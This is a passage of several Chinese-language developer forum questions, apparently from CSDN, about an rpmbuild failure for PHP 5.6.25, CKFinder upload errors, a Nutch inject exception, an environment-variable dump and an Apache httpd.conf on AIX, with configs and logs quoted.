org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1$$anonfun$apply$mcV$sp$1.apply(ShutdownHookManager.scala:188) at org.apache.spark.util.Utils$.logUncaughtExceptions(Utils.scala:1988) at org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1.apply$mcV$sp(ShutdownHookManager.scala:188) at org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1.apply(ShutdownHookManager.scala:188) at org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1.apply(ShutdownHookManager.scala:188) at scala.util.Try$.apply(Try.scala:192) at org.apache.spark.util.SparkShutdownHookManager.runAll(ShutdownHookManager.scala:188) at org.apache.spark.util.SparkShutdownHookManager$$anon$2.run(ShutdownHookManager.scala:178) at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511) at java.util.concurrent.FutureTask.run(FutureTask.java:266) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at java.lang.Thread.run(Thread.java:748) ```
centos7上用rpmbuild建立rpm安装包问题(急)
centos7.1 php-5.6.25 $ ls rpmbuild/ BUILD BUILDROOT RPMS SOURCES SPECS SRPMS $cat rpmbuild/SPECS/php.spec Name: php Version: 5.6.25 Release: 1%{?dist} Summary: compiled from 5.6.25 by Kevin Group: System Environment/Daemons License: GPL URL: https://secure.php.net Source0: php-5.6.25.tar.gz BuildRoot: %(mktemp -ud %{_tmppath}/%{name}-%{version}-%{release}-XXXXXX) BuildRequires: gcc, gcc-c++, openssl-devel Requires: wireshark-gnome %description php server. Compiled from 5.6.25 by Kevin %prep %setup -q %build ./configure '--with-libdir=lib64' '--prefix=/usr/local/php5.6' '--with-fpm-systemd' '--enable-fpm' '--enable-mbstring' '--with-mysql' '--with-mysqli' '--with-pdo-mysql' '--with-gd' '--enable-gd-native-ttf' '--with-freetype-dir' '--with-curl' '--with-openssl' '--with-mcrypt' '--enable-zip' '--enable-intl' make %{?_smp_mflags} %install rm -rf %{buildroot} make install DESTDIR=%{buildroot} %clean rm -rf %{buildroot} %files %defattr(-,root,root,-) %defattr(-,root,root,-) /usr/local/php5.6/bin/* /usr/local/php5.6/sbin/* /usr/local/php5.6/include/* /usr/local/php5.6/php/php/fpm/* /usr/local/php5.6/php/man/man1/* /usr/local/php5.6/php/man/man8/* /usr/local/php5.6/lib/php/* /usr/local/php5.6/lib/php/extensions/* /usr/local/php5.6/lib/php/extensions/no-debug-non-zts-20131226/* /usr/local/php5.6/lib/php/build/* /usr/local/php5.6/lib/php/build/shtool/* /usr/local/php5.6/lib/php/.registry/* /usr/local/php5.6/lib/php/.channels/* /usr/local/php5.6/lib/php/Archive/* /usr/local/php5.6/lib/php/doc/* /usr/local/php5.6/lib/php/doc/Archive_Tar/* /usr/local/php5.6/lib/php/doc/Archive_Tar/docs/* /usr/local/php5.6/lib/php/doc/Structures_Graph/* /usr/local/php5.6/lib/php/doc/Structures_Graph/docs/* /usr/local/php5.6/lib/php/doc/Structures_Graph/docs/tutorials/* /usr/local/php5.6/lib/php/doc/Structures_Graph/docs/tutorials/Structures_Graph/* /usr/local/php5.6/lib/php/doc/Structures_Graph/LICENSE/* /usr/local/php5.6/lib/php/doc/XML_Util/* /usr/local/php5.6/lib/php/doc/XML_Util/examples/* /usr/local/php5.6/lib/php/doc/PEAR/* /usr/local/php5.6/lib/php/doc/PEAR/LICENSE/* /usr/local/php5.6/lib/php/doc/PEAR/INSTALL/* /usr/local/php5.6/lib/php/Console/* /usr/local/php5.6/lib/php/test/* /usr/local/php5.6/lib/php/test/Console_Getopt/* /usr/local/php5.6/lib/php/test/Console_Getopt/tests/* /usr/local/php5.6/lib/php/test/Structures_Graph/* /usr/local/php5.6/lib/php/test/Structures_Graph/tests/* /usr/local/php5.6/lib/php/test/XML_Util/* /usr/local/php5.6/lib/php/test/XML_Util/tests/* /usr/local/php5.6/lib/php/Structures/* /usr/local/php5.6/lib/php/Structures/Graph/* /usr/local/php5.6/lib/php/Structures/Graph/Manipulator/* /usr/local/php5.6/lib/php/XML/* /usr/local/php5.6/lib/php/OS/* /usr/local/php5.6/lib/php/PEAR/* /usr/local/php5.6/lib/php/PEAR/ChannelFile/* /usr/local/php5.6/lib/php/PEAR/Command/* /usr/local/php5.6/lib/php/PEAR/Downloader/* /usr/local/php5.6/lib/php/PEAR/Frontend/* /usr/local/php5.6/lib/php/PEAR/Installer/* /usr/local/php5.6/lib/php/PEAR/Installer/Role/* /usr/local/php5.6/lib/php/PEAR/PackageFile/* /usr/local/php5.6/lib/php/PEAR/PackageFile/Generator/* /usr/local/php5.6/lib/php/PEAR/PackageFile/Parser/* /usr/local/php5.6/lib/php/PEAR/PackageFile/v2/* /usr/local/php5.6/lib/php/PEAR/REST/* /usr/local/php5.6/lib/php/PEAR/Task/* /usr/local/php5.6/lib/php/PEAR/Task/Postinstallscript/* /usr/local/php5.6/lib/php/PEAR/Task/Replace/* /usr/local/php5.6/lib/php/PEAR/Task/Unixeol/* /usr/local/php5.6/lib/php/PEAR/Task/Windowseol/* /usr/local/php5.6/lib/php/PEAR/Validator/* /usr/local/php5.6/lib/php/data/* /usr/local/php5.6/lib/php/data/PEAR/* %config /usr/local/php5.6/etc/* /usr/local/php5.6/var/run/* /usr/local/php5.6/lib/* %dir /usr/local/php5.6/var/log/ %post cp /usr/local/php5.6/etc/php-fpm.conf.default /usr/local/php5.6/etc/php-fpm.conf ln -s /usr/local/php5.6/bin/php /usr/bin/php %changelog * Tue Aug 30 2016 Kevin<kevin_liao@163.com> 5.6.25 - first rpm from php-5.6.25 然后用一个user用户为centos,没在root下执行 $ rpmbuild -ba rpmbuild/SPECS/php.spec 最后报错 Build complete. Don't forget to run 'make test'. + exit 0 Executing(%install): /bin/sh -e /var/tmp/rpm-tmp.QjJHDq + umask 022 + cd /home/centos/rpmbuild/BUILD + '[' /home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64 '!=' / ']' + rm -rf /home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64 ++ dirname /home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64 + mkdir -p /home/centos/rpmbuild/BUILDROOT + mkdir /home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64 + cd php-5.6.25 + rm -rf /home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64 + make install DESTDIR=/home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64 Installing shared extensions: /usr/local/php5.6/lib/php/extensions/no-debug-non-zts-20131226/ Installing PHP CLI binary: /usr/local/php5.6/bin/ Installing PHP CLI man page: /usr/local/php5.6/php/man/man1/ Installing PHP FPM binary: /usr/local/php5.6/sbin/ Installing PHP FPM config: /usr/local/php5.6/etc/ Installing PHP FPM man page: /usr/local/php5.6/php/man/man8/ Installing PHP FPM status page: /usr/local/php5.6/php/php/fpm/ Installing PHP CGI binary: /usr/local/php5.6/bin/ Installing PHP CGI man page: /usr/local/php5.6/php/man/man1/ Installing build environment: /usr/local/php5.6/lib/php/build/ Installing header files: /usr/local/php5.6/include/php/ Installing helper programs: /usr/local/php5.6/bin/ program: phpize program: php-config Installing man pages: /usr/local/php5.6/php/man/man1/ page: phpize.1 page: php-config.1 Installing PEAR environment: /usr/local/php5.6/lib/php/ [PEAR] Archive_Tar - already installed: 1.4.0 [PEAR] Console_Getopt - already installed: 1.4.1 [PEAR] Structures_Graph- already installed: 1.1.1 [PEAR] XML_Util - already installed: 1.3.0 [PEAR] PEAR - already installed: 1.10.1 Wrote PEAR system config file at: /usr/local/php5.6/etc/pear.conf You may want to add: /usr/local/php5.6/lib/php to your php.ini include_path /home/centos/rpmbuild/BUILD/php-5.6.25/build/shtool install -c ext/phar/phar.phar /usr/local/php5.6/bin ln -s -f phar.phar /usr/local/php5.6/bin/phar Installing PDO headers: /usr/local/php5.6/include/php/ext/pdo/ + /usr/lib/rpm/find-debuginfo.sh --strict-build-id -m --run-dwz --dwz-low-mem-die-limit 10000000 --dwz-max-die-limit 110000000 /home/centos/rpmbuild/BUILD/php-5.6.25 find: '/home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64': No such file or directory error: Bad exit status from /var/tmp/rpm-tmp.QjJHDq (%install) RPM build errors: Bad exit status from /var/tmp/rpm-tmp.QjJHDq (%install)
java环境下ckfinder,上传图片时,部分图片提示 由于文件系统的限制,该请求不能完成
**1.问题:** ** java**下的ckfinder **上传部分图片**时报 由于文件系统的限制,该请求不能完成。一部分图片可以上传成功,另外一部分报错 **2.ckfinder.xml ** ``` <config> <enabled>true</enabled> <baseDir></baseDir> <baseURL>/userfiles/</baseURL> <licenseKey></licenseKey> <licenseName></licenseName> <imgWidth>2000</imgWidth> <imgHeight>2000</imgHeight> <imgQuality>80</imgQuality> <uriEncoding>UTF-8</uriEncoding> <forceASCII>false</forceASCII> <disallowUnsafeCharacters>false</disallowUnsafeCharacters> <userRoleSessionVar>CKFinder_UserRole</userRoleSessionVar> <checkDoubleExtension>true</checkDoubleExtension> <checkSizeAfterScaling>true</checkSizeAfterScaling> <secureImageUploads>true</secureImageUploads> <htmlExtensions>html,htm,xml,js</htmlExtensions> <hideFolders> <folder>.*</folder> <folder>CVS</folder> </hideFolders> <hideFiles> <file>.*</file> </hideFiles> <defaultResourceTypes></defaultResourceTypes> <types> <type name="files"> <url>%BASE_URL%files/</url> <directory>%BASE_DIR%files</directory> <maxSize>400M</maxSize> <allowedExtensions>7z,aiff,asf,avi,bmp,csv,doc,docx,fla,flv,gif,gz,gzip,jpeg,jpg,mid,mov,mp3,mp4,mpc,mpeg,mpg,ods,odt,pdf,png,ppt,pptx,pxd,qt,ram,rar,rm,rmi,rmvb,rtf,sdc,sitd,swf,sxc,sxw,tar,tgz,tif,tiff,txt,vsd,wav,wma,wmv,xls,xlsx,zip</allowedExtensions> <deniedExtensions></deniedExtensions> </type> <type name="images"> <url>%BASE_URL%images/</url> <directory>%BASE_DIR%images</directory> <maxSize>400M</maxSize> <allowedExtensions>bmp,gif,jpeg,jpg,png</allowedExtensions> <deniedExtensions></deniedExtensions> </type> <type name="flash"> <url>%BASE_URL%flash/</url> <directory>%BASE_DIR%flash</directory> <maxSize>400M</maxSize> <allowedExtensions>swf,flv</allowedExtensions> <deniedExtensions></deniedExtensions> </type> <type name="resfile"> <url>%BASE_URL%resfile/</url> <directory>%BASE_DIR%resfile</directory> <maxSize>400M</maxSize> <allowedExtensions>swf,flv,pdf,xls,xlsx,mp4</allowedExtensions> <deniedExtensions></deniedExtensions> </type> </types> <accessControls> <accessControl> <role>*</role> <resourceType>*</resourceType> <folder>/</folder> <folderView>true</folderView> <folderCreate>true</folderCreate> <folderRename>true</folderRename> <folderDelete>true</folderDelete> <fileView>true</fileView> <fileUpload>true</fileUpload> <fileRename>true</fileRename> <fileDelete>true</fileDelete> </accessControl> </accessControls> <thumbs> <enabled>true</enabled> <url>%BASE_URL%_thumbs/</url> <directory>%BASE_DIR%_thumbs</directory> <directAccess>true</directAccess> <maxWidth>550</maxWidth> <maxHeight>310</maxHeight> <quality>80</quality> </thumbs> <plugins> <plugin> <name>imageresize</name> <class>com.ckfinder.connector.plugins.ImageResize</class> <params> <param name="smallThumb" value="90x90"></param> <param name="mediumThumb" value="120x120"></param> <param name="largeThumb" value="180x180"></param> </params> </plugin> <plugin> <name>fileeditor</name> <class>com.ckfinder.connector.plugins.FileEditor</class> <params></params> </plugin> </plugins> <basePathBuilderImpl>com.ckfinder.connector.configuration.ConfigurationPathBuilder</basePathBuilderImpl> </config> ``` 3.截图,上传失败 ![图片说明](https://img-ask.csdn.net/upload/201908/05/1564989151_68525.jpg) 截图,上传成功 ![图片说明](https://img-ask.csdn.net/upload/201908/05/1564989400_818875.jpg)
Nutch+MongoDB+ElasticSearch+Kibana搭建inject操作异常
linux搭建Nutch+MongoDB+ElasticSearch+Kibana环境环境,nutch是apache-nutch-2.3.1-src.tar.gz源码编译的。 参考:http://blog.csdn.net/github_27609763/article/details/50597427进行搭建, 但是执行到./bin/nutch inject urls/报错,跪求大神指教 其中配置如下 nutch-site.xml ``` <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="configuration.xsl"?> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <!-- Put site-specific property overrides in this file. --> <configuration> <property> <name>storage.data.store.class</name> <value>org.apache.gora.mongodb.store.MongoStore</value> <description>Default class for storing data</description> </property> <property> <name>http.agent.name</name> <value>Hist Crawler</value> </property> <property> <name>plugin.includes</name> <value>protocol-(httphttpclient)urlfilter-regexindex-(basicmore)query-(basicsiteurllang)indexer-elasticnutch-extensionpointsparse-(texthtmlmsexcelmswordmspowerpointpdf)summary-basicscoring-opicurlnormalizer-(passregexbasic)parse-(htmltikametatags)index-(basicanchormoremetadata)</value> </property> <property> <name>elastic.host</name> <value>localhost</value> </property> <property> <name>elastic.cluster</name> <value>hist</value> </property> <property> <name>elastic.index</name> <value>nutch</value> </property> <property> <name>parser.character.encoding.default</name> <value>utf-8</value> </property> <property> <name>http.content.limit</name> <value>6553600</value> </property> </configuration> ``` regex-urlfilter.txt的配置如下 ``` # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # The default url filter. # Better for whole-internet crawling. # Each non-comment, non-blank line contains a regular expression # prefixed by '+' or '-'. The first matching pattern in the file # determines whether a URL is included or ignored. If no pattern # matches, the URL is ignored. # skip file: ftp: and mailto: urls -^(file|ftp|mailto): # skip image and other suffixes we can't yet parse # for a more extensive coverage use the urlfilter-suffix plugin -\.(gif|GIF|jpg|JPG|png|PNG|ico|ICO|css|CSS|sit|SIT|eps|EPS|wmf|WMF|zip|ZIP|ppt|PPT|mpg|MPG|xls|XLS|gz|GZ|rpm|RPM|tgz|TGZ|mov|MOV|exe|EXE|jpeg|JPEG|bmp|BMP|js|JS)$ # skip URLs containing certain characters as probable queries, etc. -[?*!@=] # skip URLs with slash-delimited segment that repeats 3+ times, to break loops -.*(/[^/]+)/[^/]+\1/[^/]+\1/ # accept anything else +^http://([a-z0-9]*\.)*nutch.apache.org/ # +. ``` 另外urls下面的seed.txt配置如下cat ``` [root@jdu4e00u53f7 urls]# pwd /chen/nutch/runtime/local/urls [root@jdu4e00u53f7 urls]# cat seed.txt http://blog.csdn.net/ [root@jdu4e00u53f7 urls]# ``` 最后错误信息如下: ``` 2017-09-25 23:35:17,648 INFO crawl.InjectorJob - InjectorJob: starting at 2017-09-25 23:35:17 2017-09-25 23:35:17,649 INFO crawl.InjectorJob - InjectorJob: Injecting urlDir: urls 2017-09-25 23:35:18,058 WARN util.NativeCodeLoader - Unable to load native-hadoop library for your platform... using builtin-java classes where applicable 2017-09-25 23:35:19,115 INFO crawl.InjectorJob - InjectorJob: Using class org.apache.gora.mongodb.store.MongoStore as the Gora storage class. 2017-09-25 23:35:20,006 WARN conf.Configuration - file:/tmp/hadoop-root/mapred/staging/root1639902035/.staging/job_local1639902035_0001/job.xml:an attempt to override final parameter: mapreduce.job.end-notification.max.retry.interval; Ignoring. 2017-09-25 23:35:20,009 WARN conf.Configuration - file:/tmp/hadoop-root/mapred/staging/root1639902035/.staging/job_local1639902035_0001/job.xml:an attempt to override final parameter: mapreduce.job.end-notification.max.attempts; Ignoring. 2017-09-25 23:35:20,172 WARN conf.Configuration - file:/tmp/hadoop-root/mapred/local/localRunner/root/job_local1639902035_0001/job_local1639902035_0001.xml:an attempt to override final parameter: mapreduce.job.end-notification.max.retry.interval; Ignoring. 2017-09-25 23:35:20,175 WARN conf.Configuration - file:/tmp/hadoop-root/mapred/local/localRunner/root/job_local1639902035_0001/job_local1639902035_0001.xml:an attempt to override final parameter: mapreduce.job.end-notification.max.attempts; Ignoring. 2017-09-25 23:35:20,504 WARN mapred.LocalJobRunner - job_local1639902035_0001 java.lang.Exception: java.lang.RuntimeException: x point org.apache.nutch.net.URLNormalizer not found. at org.apache.hadoop.mapred.LocalJobRunner$Job.runTasks(LocalJobRunner.java:462) at org.apache.hadoop.mapred.LocalJobRunner$Job.run(LocalJobRunner.java:522) Caused by: java.lang.RuntimeException: x point org.apache.nutch.net.URLNormalizer not found. at org.apache.nutch.net.URLNormalizers.<init>(URLNormalizers.java:141) at org.apache.nutch.crawl.InjectorJob$UrlMapper.setup(InjectorJob.java:94) at org.apache.hadoop.mapreduce.Mapper.run(Mapper.java:142) at org.apache.hadoop.mapred.MapTask.runNewMapper(MapTask.java:764) at org.apache.hadoop.mapred.MapTask.run(MapTask.java:340) at org.apache.hadoop.mapred.LocalJobRunner$Job$MapTaskRunnable.run(LocalJobRunner.java:243) at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511) at java.util.concurrent.FutureTask.run(FutureTask.java:266) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at java.lang.Thread.run(Thread.java:748) 2017-09-25 23:35:21,198 ERROR crawl.InjectorJob - InjectorJob: java.lang.RuntimeException: job failed: name=apache-nutch-2.3.1.jar, jobid=job_local1639902035_0001 at org.apache.nutch.util.NutchJob.waitForCompletion(NutchJob.java:120) at org.apache.nutch.crawl.InjectorJob.run(InjectorJob.java:231) at org.apache.nutch.crawl.InjectorJob.inject(InjectorJob.java:252) at org.apache.nutch.crawl.InjectorJob.run(InjectorJob.java:275) at org.apache.hadoop.util.ToolRunner.run(ToolRunner.java:70) at org.apache.nutch.crawl.InjectorJob.main(InjectorJob.java:284) ```
linux执行source /etc/profile时出现如下情况
declare -x CLASSPATH=".:/usr/local/java/jdk1.8.0_191//lib/dt.jar:/usr/local/java/jdk1.8.0_191//lib/tools.jar:/usr/local/java/jdk1.8.0_191/jre//lib:.:/usr/local/java/jdk1.8.0_191//lib/dt.jar:/usr/local/java/jdk1.8.0_191//lib/tools.jar:/usr/local/java/jdk1.8.0_191/jre//lib:" declare -x DISPLAY="localhost:10.0" declare -x HADOOP_HOME="/usr/local/hadoop/hadoop-2.8.5/" declare -x HISTCONTROL="ignoredups" declare -x HISTSIZE="1000" declare -x HIVE_HOME="/usr/local/hive" declare -x HOME="/root" declare -x HOSTNAME="hadoop01" declare -x JAVA_HOME="/usr/local/java/jdk1.8.0_191/" declare -x JRE_HOME="/usr/local/java/jdk1.8.0_191/jre/" declare -x LANG="zh_CN.UTF-8" declare -x LESSOPEN="||/usr/bin/lesspipe.sh %s" declare -x LOGNAME="root" declare -x LS_COLORS="rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;05;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.axa=01;36:*.oga=01;36:*.spx=01;36:*.xspf=01;36:" declare -x MAIL="/var/spool/mail/root" declare -x OLDPWD="/root" declare -x PATH="/usr/local/hive/bin:/usr/local/hive/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/usr/local/java/jdk1.8.0_191//bin:/usr/local/hadoop/hadoop-2.8.5//bin:/usr/local/hadoop/hadoop-2.8.5//sbin::/root/bin:/usr/local/java/jdk1.8.0_191//bin:/usr/local/java/jdk1.8.0_191/jre//bin:/usr/local/hadoop/hadoop-2.8.5//bin:/usr/local/hadoop/hadoop-2.8.5//sbin:" declare -x PWD="/usr/local/hadoop/hadoop-2.8.5" declare -x SELINUX_LEVEL_REQUESTED="" declare -x SELINUX_ROLE_REQUESTED="" declare -x SELINUX_USE_CURRENT_RANGE="" declare -x SHELL="/bin/bash" declare -x SHLVL="1" declare -x SSH_CLIENT="192.168.240.1 52834 22" declare -x SSH_CONNECTION="192.168.240.1 52834 192.168.240.131 22" declare -x SSH_TTY="/dev/pts/0" declare -x TERM="xterm" declare -x USER="root" declare -x XDG_DATA_DIRS="/root/.local/share/flatpak/exports/share:/var/lib/flatpak/exports/share:/usr/local/share:/usr/share" declare -x XDG_RUNTIME_DIR="/run/user/0" declare -x XDG_SESSION_ID="1"
请教apache重启问题
AIX Version 5环境 <br />不是自带的apache <br />用apachectl start启动的时候 <br />没有显示错误 <br />实际没有启动 <br />原因:http://192.168.108.12:8081/ 连接失败 <br /> <br />httpd -t 测试结果 ok! <br /> <br />httpd.conf内容如下 <br />------------------------ <br /># <br /># Based upon the NCSA server configuration files originally by Rob McCool. <br /># <br /># This is the main Apache server configuration file.  It contains the <br /># configuration directives that give the server its instructions. <br /># See &lt;url:http: httpd.apache.org="" docs="" 2.0=""/&gt; for detailed information about <br /># the directives. <br /># <br /># Do NOT simply read the instructions in here without understanding <br /># what they do.  They're here only as hints or reminders.  If you are unsure <br /># consult the online docs. You have been warned.  <br /># <br /># The configuration directives are grouped into three basic sections: <br />#  1. Directives that control the operation of the Apache server process as a <br />#     whole (the 'global environment'). <br />#  2. Directives that define the parameters of the 'main' or 'default' server, <br />#     which responds to requests that aren't handled by a virtual host. <br />#     These directives also provide default values for the settings <br />#     of all virtual hosts. <br />#  3. Settings for virtual hosts, which allow Web requests to be sent to <br />#     different IP addresses or hostnames and have them handled by the <br />#     same Apache server process. <br /># <br /># Configuration and logfile names: If the filenames you specify for many <br /># of the server's control files begin with "/" (or "drive:/" for Win32), the <br /># server will use that explicit path.  If the filenames do *not* begin <br /># with "/", the value of ServerRoot is prepended -- so "logs/foo.log" <br /># with ServerRoot set to "/home/weblogic/apache/" will be interpreted by the <br /># server as "/home/weblogic/apache//logs/foo.log". <br /># <br /> <br />### Section 1: Global Environment <br /># <br /># The directives in this section affect the overall operation of Apache, <br /># such as the number of concurrent requests it can handle or where it <br /># can find its configuration files. <br /># <br /> <br /># <br /># ServerRoot: The top of the directory tree under which the server's <br /># configuration, error, and log files are kept. <br /># <br /># NOTE!  If you intend to place this on an NFS (or otherwise network) <br /># mounted filesystem then please read the LockFile documentation (available <br /># at &lt;url:http: httpd.apache.org="" docs="" 2.0="" mod="" mpm_common.html#lockfile=""&gt;); <br /># you will save yourself a lot of trouble. <br /># <br /># Do NOT add a slash at the end of the directory path. <br /># <br />ServerRoot "/home/weblogic/apache/" <br /> <br /># <br /># The accept serialization lock file MUST BE STORED ON A LOCAL DISK. <br /># <br />&lt;ifmodule !mpm_winnt.c=""&gt; <br />&lt;ifmodule !mpm_netware.c=""&gt; <br />#LockFile logs/accept.lock <br />&lt;/ifmodule&gt; <br />&lt;/ifmodule&gt; <br /> <br /># <br /># ScoreBoardFile: File used to store internal server process information. <br /># If unspecified (the default), the scoreboard will be stored in an <br /># anonymous shared memory segment, and will be unavailable to third-party <br /># applications. <br /># If specified, ensure that no two invocations of Apache share the same <br /># scoreboard file. The scoreboard file MUST BE STORED ON A LOCAL DISK. <br /># <br />&lt;ifmodule !mpm_netware.c=""&gt; <br />&lt;ifmodule !perchild.c=""&gt; <br />#ScoreBoardFile logs/apache_runtime_status <br />&lt;/ifmodule&gt; <br />&lt;/ifmodule&gt; <br /> <br /> <br /># <br /># PidFile: The file in which the server should record its process <br /># identification number when it starts. <br /># <br />&lt;ifmodule !mpm_netware.c=""&gt; <br />PidFile logs/httpd.pid <br />&lt;/ifmodule&gt; <br /> <br /># <br /># Timeout: The number of seconds before receives and sends time out. <br /># <br />Timeout 300 <br /> <br /># <br /># KeepAlive: Whether or not to allow persistent connections (more than <br /># one request per connection). Set to "Off" to deactivate. <br /># <br />KeepAlive On <br /> <br /># <br /># MaxKeepAliveRequests: The maximum number of requests to allow <br /># during a persistent connection. Set to 0 to allow an unlimited amount. <br /># We recommend you leave this number high, for maximum performance. <br /># <br />MaxKeepAliveRequests 100 <br /> <br /># <br /># KeepAliveTimeout: Number of seconds to wait for the next request from the <br /># same client on the same connection. <br /># <br />KeepAliveTimeout 15 <br /> <br />## <br />## Server-Pool Size Regulation (MPM specific) <br />## <br /> <br /># prefork MPM <br /># StartServers: number of server processes to start <br /># MinSpareServers: minimum number of server processes which are kept spare <br /># MaxSpareServers: maximum number of server processes which are kept spare <br /># MaxClients: maximum number of server processes allowed to start <br /># MaxRequestsPerChild: maximum number of requests a server process serves <br />&lt;ifmodule prefork.c=""&gt; <br />StartServers         5 <br />MinSpareServers      5 <br />MaxSpareServers     10 <br />MaxClients         150 <br />MaxRequestsPerChild  0 <br />&lt;/ifmodule&gt; <br /> <br /># worker MPM <br /># StartServers: initial number of server processes to start <br /># MaxClients: maximum number of simultaneous client connections <br /># MinSpareThreads: minimum number of worker threads which are kept spare <br /># MaxSpareThreads: maximum number of worker threads which are kept spare <br /># ThreadsPerChild: constant number of worker threads in each server process <br /># MaxRequestsPerChild: maximum number of requests a server process serves <br />&lt;ifmodule worker.c=""&gt; <br />StartServers         2 <br />MaxClients         150 <br />MinSpareThreads     25 <br />MaxSpareThreads     75 <br />ThreadsPerChild     25 <br />MaxRequestsPerChild  0 <br />&lt;/ifmodule&gt; <br /> <br /># perchild MPM <br /># NumServers: constant number of server processes <br /># StartThreads: initial number of worker threads in each server process <br /># MinSpareThreads: minimum number of worker threads which are kept spare <br /># MaxSpareThreads: maximum number of worker threads which are kept spare <br /># MaxThreadsPerChild: maximum number of worker threads in each server process <br /># MaxRequestsPerChild: maximum number of connections per server process <br />&lt;ifmodule perchild.c=""&gt; <br />NumServers           5 <br />StartThreads         5 <br />MinSpareThreads      5 <br />MaxSpareThreads     10 <br />MaxThreadsPerChild  20 <br />MaxRequestsPerChild  0 <br />&lt;/ifmodule&gt; <br /> <br /># WinNT MPM <br /># ThreadsPerChild: constant number of worker threads in the server process <br /># MaxRequestsPerChild: maximum  number of requests a server process serves <br />&lt;ifmodule mpm_winnt.c=""&gt; <br />ThreadsPerChild 250 <br />MaxRequestsPerChild  0 <br />&lt;/ifmodule&gt; <br /> <br /># BeOS MPM <br /># StartThreads: how many threads do we initially spawn? <br /># MaxClients:   max number of threads we can have (1 thread == 1 client) <br /># MaxRequestsPerThread: maximum number of requests each thread will process <br />&lt;ifmodule beos.c=""&gt; <br />StartThreads               10 <br />MaxClients                 50 <br />MaxRequestsPerThread       10000 <br />&lt;/ifmodule&gt;    <br /> <br /># NetWare MPM <br /># ThreadStackSize: Stack size allocated for each worker thread <br /># StartThreads: Number of worker threads launched at server startup <br /># MinSpareThreads: Minimum number of idle threads, to handle request spikes <br /># MaxSpareThreads: Maximum number of idle threads <br /># MaxThreads: Maximum number of worker threads alive at the same time <br /># MaxRequestsPerChild: Maximum  number of requests a thread serves. It is <br />#                      recommended that the default value of 0 be set for this <br />#                      directive on NetWare.  This will allow the thread to <br />#                      continue to service requests indefinitely.                          <br />&lt;ifmodule mpm_netware.c=""&gt; <br />ThreadStackSize      65536 <br />StartThreads           250 <br />MinSpareThreads         25 <br />MaxSpareThreads        250 <br />MaxThreads            1000 <br />MaxRequestsPerChild      0 <br />MaxMemFree             100 <br />&lt;/ifmodule&gt; <br /> <br /># 